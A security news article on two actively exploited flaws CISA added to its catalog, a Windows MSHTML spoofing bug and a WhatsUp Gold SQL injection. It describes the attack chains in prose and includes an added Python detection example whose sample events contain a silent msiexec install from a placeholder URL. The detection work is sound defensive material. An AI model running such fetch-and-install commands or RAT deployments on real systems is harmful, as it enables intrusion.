CISA Flags Two Actively Exploited Vulnerabilities: Critical Threats to Windows and WhatsUp Gold

Exploited Windows Security Vulnerabilities

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued a warning, adding two actively exploited security flaws to its Known Exploited Vulnerabilities (KEV) catalog, urging immediate action from federal agencies and organizations worldwide.

CVE-2024-43461: Microsoft Windows MSHTML Platform Spoofing Vulnerability (CVSS 8.8)

Microsoft’s MSHTML platform is under siege as a critical user interface (UI) misrepresentation flaw has come to light. Identified as CVE-2024-43461, this vulnerability enables attackers to spoof web pages, tricking users into downloading or executing malicious files. Exploiting this flaw requires user interaction, typically by visiting a malicious website or opening a specially crafted file. The flaw’s danger lies in how it disguises file extensions, misleading users into believing a malicious file is harmless.

According to a security advisory by the Zero Day Initiative (ZDI), the vulnerability arises from the way Internet Explorer prompts users after downloading a file. Attackers can exploit this misrepresentation to execute malicious code in the context of the current user. The threat is exacerbated by the fact that the vulnerability was exploited in tandem with CVE-2024-38112, a zero-day vulnerability with a CVSS score of 7.5.

In July 2024, Trend Micro researchers linked CVE-2024-38112 to an advanced persistent threat (APT) group dubbed “Void Banshee.” This group exploited the Windows zero-day to deploy the Atlantida info-stealer malware, which siphons sensitive data such as passwords and browser cookies from compromised systems. The flaw was first observed being exploited in May 2024, with Void Banshee utilizing it to target systems where Internet Explorer was disabled, further complicating detection and defense.

CVE-2024-6670: Progress WhatsUp Gold SQL Injection Vulnerability (CVSS 9.8)

Progress WhatsUp Gold, a popular network monitoring tool, is affected by a severe SQL injection vulnerability tracked as CVE-2024-6670. This flaw, rated at a critical CVSS score of 9.8, allows unauthenticated attackers to retrieve encrypted user passwords if the application is configured with a single user. Even more troubling, this vulnerability has been leveraged in a series of remote code execution (RCE) attacks.

Trend Micro researchers discovered that attackers are exploiting the SQL injection vulnerability through the Active Monitor PowerShell Script function, using NmPoller.exe, a legitimate WhatsUp Gold process, to execute malicious PowerShell scripts. By doing so, attackers can download and deploy various remote access tools (RATs), such as Atera Agent, Radmin, SimpleHelp Remote Access, and Splashtop Remote, establishing persistence on the victim’s system.

Attackers used msiexec.exe, a trusted Windows installer process, to stealthily install the RATs from malicious URLs, thereby bypassing traditional detection mechanisms. Once inside the network, the threat actors could operate undetected, maintaining control over compromised environments while continuously exfiltrating data or deploying additional payloads.
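The two behaviours described above (NmPoller.exe launching PowerShell, and msiexec.exe installing a package straight from a remote URL) are both visible in ordinary process-creation telemetry. The following detection logic is an added example, not code from the article, Trend Micro or Progress; it assumes Sysmon-style parent/child/command-line fields, and every sample event, path and URL in it is constructed.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

@dataclass
class ProcEvent:
    """Minimal process-creation record (Sysmon Event ID 1 style fields)."""
    parent_image: str
    image: str
    command_line: str

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)

def basename(path: str) -> str:
    """Return the lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(ev: ProcEvent) -> List[str]:
    """Return the names of every rule that fires for one event."""
    hits = []
    # Rule 1: the WhatsUp Gold poller launching PowerShell (abused Active Monitor script).
    if basename(ev.parent_image) == "nmpoller.exe" and basename(ev.image) in POWERSHELL_IMAGES:
        hits.append("whatsup_gold_poller_spawned_powershell")
    # Rule 2: msiexec installing a package directly from a remote URL.
    if basename(ev.image) == "msiexec.exe" and REMOTE_URL.search(ev.command_line):
        hits.append("msiexec_install_from_remote_url")
    return hits

def scan(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Run all rules over a list of events; returns (event index, rule name) pairs."""
    return [(i, rule) for i, ev in enumerate(events) for rule in classify(ev)]

# Constructed sample events; paths and the URL are placeholders, not real indicators.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files (x86)\Ipswitch\WhatsUp\NmPoller.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -NoProfile -File C:\Windows\Temp\task.ps1"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\msiexec.exe",
              "msiexec.exe /i https://placeholder.invalid/agent.msi /qn"),
    ProcEvent(r"C:\Windows\System32\services.exe",                 # normal service start
              r"C:\Program Files (x86)\Ipswitch\WhatsUp\NmPoller.exe",
              "NmPoller.exe"),
    ProcEvent(r"C:\Windows\explorer.exe",                          # local install, benign
              r"C:\Windows\System32\msiexec.exe",
              r"msiexec.exe /i C:\Installers\tool.msi"),
]
```

Only the first two constructed events trigger a rule; the legitimate service start of NmPoller.exe and a local MSI install pass silently, which is the false-positive check to keep when tuning this against real telemetry.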

Federal Agencies Mandated to Act

In response to the active exploitation of these two vulnerabilities, CISA has mandated that federal agencies apply the necessary patches and mitigations by October 7, 2024. Microsoft and Progress have both released patches addressing these flaws, and administrators are urged to update affected systems immediately to prevent further exploitation.
